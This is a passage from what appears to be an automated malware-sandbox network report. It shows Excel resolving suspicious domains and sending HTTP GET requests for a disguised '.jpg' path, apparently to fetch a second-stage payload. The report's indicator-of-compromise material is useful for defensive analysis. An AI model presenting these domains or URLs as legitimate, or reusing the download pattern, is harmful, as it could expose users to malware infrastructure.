Jul 6, 2021 15:57:23.503772020 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.503873110 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.504815102 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.504842997 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.504903078 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.505918026 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.505948067 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.506021023 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.507030964 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.507050037 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.507122993 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.508153915 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.508183002 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.508250952 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.509246111 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.509267092 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.509341002 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.510420084 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.510449886 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.510519028 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.511490107 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.511548042 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.511636019 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.512634993 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.512691021 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.512778044 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.513667107 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.533715963 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.533740997 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.533962965 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.534132957 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.534149885 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.534220934 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.535268068 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.535290003 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.535417080 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.536417961 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.536434889 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.536509991 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.537517071 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.537533998 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.537607908 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.582767963 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.582803965 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.582828999 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.582850933 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.582868099 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.582897902 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.582905054 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.582927942 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.582978964 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.583347082 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.583379030 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.583472013 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.584047079 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.584083080 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.584163904 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.584760904 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.584789991 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.584846973 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.585444927 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.585477114 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.585592985 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.586141109 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.586184025 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.586250067 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.586883068 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.586925983 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.586990118 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.587635994 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.587666988 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.587721109 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.588320017 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.588351011 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.588406086 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.589066029 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.589095116 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.589157104 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.589741945 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.589771986 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.589838982 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.590430975 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.590533972 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.590594053 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.591145992 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.591178894 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.591300011 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.591881990 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.591919899 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.591986895 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.592582941 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.592616081 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.592696905 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.593307018 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.593338966 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.593419075 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.593986988 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.594021082 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.594126940 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.594662905 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.594691038 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.594788074 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.595412970 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.596899033 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.596930027 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.596952915 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.596973896 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.596996069 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.597028017 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.597035885 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.597084045 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.597552061 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.597578049 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.597625017 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.608676910 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.622093916 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.622127056 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.622184992 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.622380972 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.622410059 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.622471094 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.623053074 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.623084068 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.623150110 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.623753071 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.623781919 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.623831987 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.624475002 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.624515057 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.624569893 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.625168085 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.625190020 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.625252962 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.625888109 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.625906944 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.625972033 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.626595020 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.626612902 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.626674891 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.627302885 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.627324104 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.627388000 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.627999067 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.628021002 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.628079891 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.628751040 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.628771067 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.628844023 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.629399061 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.629417896 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.629467964 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.630137920 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.630157948 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.630233049 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.630839109 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.630860090 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.630908966 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.631555080 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.631582975 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.631640911 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.632318974 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.632373095 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.632452965 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.632987976 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.633013010 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.633095026 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.633708954 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.633737087 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.633786917 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.634403944 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.634434938 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.634495020 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.635111094 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.635160923 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.635216951 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.635814905 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.635843992 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.635899067 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.636533022 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.636557102 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.636609077 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.654966116 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.669549942 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.669581890 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.669606924 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.669883966 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.669908047 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.669929028 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.669985056 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.669997931 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.670561075 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.670761108 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.670787096 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.670810938 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.670859098 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.671637058 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.671670914 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.671694040 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.671706915 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.671761990 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.672516108 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.672544956 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.672565937 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.672599077 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.673326969 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.673434973 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.673470020 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.673496962 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.673522949 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.674199104 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.674257994 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.674280882 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.674310923 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.674359083 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.675096989 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.675168037 CEST	443	49168	13.225.75.73	192.168.2.22
Jul 6, 2021 15:57:23.675234079 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:57:23.982741117 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 15:57:24.021975040 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 15:57:24.022135019 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 15:57:24.022802114 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 15:57:24.063500881 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 15:57:24.586483002 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 15:57:24.586541891 CEST	80	49169	172.67.213.115	192.168.2.22
Jul 6, 2021 15:57:24.586625099 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 15:57:26.430666924 CEST	49169	80	192.168.2.22	172.67.213.115
Jul 6, 2021 15:57:26.430747032 CEST	49168	443	192.168.2.22	13.225.75.73
Jul 6, 2021 15:59:20.683161020 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 15:59:20.683478117 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:59:20.683723927 CEST	49165	80	192.168.2.22	172.67.198.51
Jul 6, 2021 15:59:20.722584009 CEST	80	49167	172.67.146.88	192.168.2.22
Jul 6, 2021 15:59:20.722820997 CEST	49167	80	192.168.2.22	172.67.146.88
Jul 6, 2021 15:59:20.723107100 CEST	80	49166	172.67.194.117	192.168.2.22
Jul 6, 2021 15:59:20.723222017 CEST	49166	80	192.168.2.22	172.67.194.117
Jul 6, 2021 15:59:20.724863052 CEST	80	49165	172.67.198.51	192.168.2.22
Jul 6, 2021 15:59:20.725003004 CEST	49165	80	192.168.2.22	172.67.198.51

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 6, 2021 15:57:20.753262997 CEST	52197	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:20.812948942 CEST	53	52197	8.8.8.8	192.168.2.22
Jul 6, 2021 15:57:20.945214033 CEST	53099	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:21.009224892 CEST	53	53099	8.8.8.8	192.168.2.22
Jul 6, 2021 15:57:21.178049088 CEST	52838	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:21.235697031 CEST	53	52838	8.8.8.8	192.168.2.22
Jul 6, 2021 15:57:22.371150017 CEST	61200	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:22.430419922 CEST	53	61200	8.8.8.8	192.168.2.22
Jul 6, 2021 15:57:22.467468977 CEST	49548	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:22.524723053 CEST	53	49548	8.8.8.8	192.168.2.22
Jul 6, 2021 15:57:23.848179102 CEST	55627	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:23.908512115 CEST	53	55627	8.8.8.8	192.168.2.22
Jul 6, 2021 15:57:23.915884972 CEST	56009	53	192.168.2.22	8.8.8.8
Jul 6, 2021 15:57:23.980735064 CEST	53	56009	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 6, 2021 15:57:20.753262997 CEST	192.168.2.22	8.8.8.8	0x82b3	Standard query (0)	thousandsyears.download	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:20.945214033 CEST	192.168.2.22	8.8.8.8	0xe9da	Standard query (0)	voopeople.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:21.178049088 CEST	192.168.2.22	8.8.8.8	0xfc39	Standard query (0)	uppercilio.fun	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:22.371150017 CEST	192.168.2.22	8.8.8.8	0x45a5	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:22.467468977 CEST	192.168.2.22	8.8.8.8	0x6e2b	Standard query (0)	aws.amazon.com	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:23.848179102 CEST	192.168.2.22	8.8.8.8	0x8ff4	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:23.915884972 CEST	192.168.2.22	8.8.8.8	0x7a0a	Standard query (0)	astrocycle.download	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 6, 2021 15:57:20.812948942 CEST	8.8.8.8	192.168.2.22	0x82b3	No error (0)	thousandsyears.download		172.67.198.51	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:20.812948942 CEST	8.8.8.8	192.168.2.22	0x82b3	No error (0)	thousandsyears.download		104.21.52.111	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:21.009224892 CEST	8.8.8.8	192.168.2.22	0xe9da	No error (0)	voopeople.fun		172.67.194.117	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:21.009224892 CEST	8.8.8.8	192.168.2.22	0xe9da	No error (0)	voopeople.fun		104.21.12.122	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:21.235697031 CEST	8.8.8.8	192.168.2.22	0xfc39	No error (0)	uppercilio.fun		172.67.146.88	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:21.235697031 CEST	8.8.8.8	192.168.2.22	0xfc39	No error (0)	uppercilio.fun		104.21.55.83	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:22.430419922 CEST	8.8.8.8	192.168.2.22	0x45a5	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 15:57:22.430419922 CEST	8.8.8.8	192.168.2.22	0x45a5	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 15:57:22.430419922 CEST	8.8.8.8	192.168.2.22	0x45a5	No error (0)	dr49lng3n1n2s.cloudfront.net		13.225.75.73	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:22.524723053 CEST	8.8.8.8	192.168.2.22	0x6e2b	No error (0)	aws.amazon.com	tp.8e49140c2-frontier.amazon.com		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 15:57:22.524723053 CEST	8.8.8.8	192.168.2.22	0x6e2b	No error (0)	tp.8e49140c2-frontier.amazon.com	dr49lng3n1n2s.cloudfront.net		CNAME (Canonical name)	IN (0x0001)
Jul 6, 2021 15:57:22.524723053 CEST	8.8.8.8	192.168.2.22	0x6e2b	No error (0)	dr49lng3n1n2s.cloudfront.net		13.225.75.73	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:23.908512115 CEST	8.8.8.8	192.168.2.22	0x8ff4	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:23.908512115 CEST	8.8.8.8	192.168.2.22	0x8ff4	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:23.980735064 CEST	8.8.8.8	192.168.2.22	0x7a0a	No error (0)	astrocycle.download		104.21.37.209	A (IP address)	IN (0x0001)
Jul 6, 2021 15:57:23.980735064 CEST	8.8.8.8	192.168.2.22	0x7a0a	No error (0)	astrocycle.download		172.67.213.115	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

thousandsyears.download

voopeople.fun

uppercilio.fun

astrocycle.download

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	172.67.198.51	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 15:57:20.868705034 CEST	0	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: thousandsyears.download Connection: Keep-Alive
Jul 6, 2021 15:57:20.921128035 CEST	1	IN	HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 13:57:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 49 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=15TDkqF1xA5q%2BTeugrrCTCoPfvvfA1Y6v0TR6IiQQSNOhPIpDjoqbsu6D2QzwRnlNLJezydLPOkLlykMsJpF7FxfhZsP4mOeKrPojr5s4hiL2c2QLvF57Vyx8yvXn73Dok%2Fw0WQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 66a957759c2e4a9e-FRA Content-Encoding: gzip alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
Jul 6, 2021 15:57:20.921160936 CEST	1	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	172.67.194.117	80	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Jul 6, 2021 15:57:21.052625895 CEST	2	OUT	GET /div/44376,8555986111.jpg HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: voopeople.fun Connection: Keep-Alive
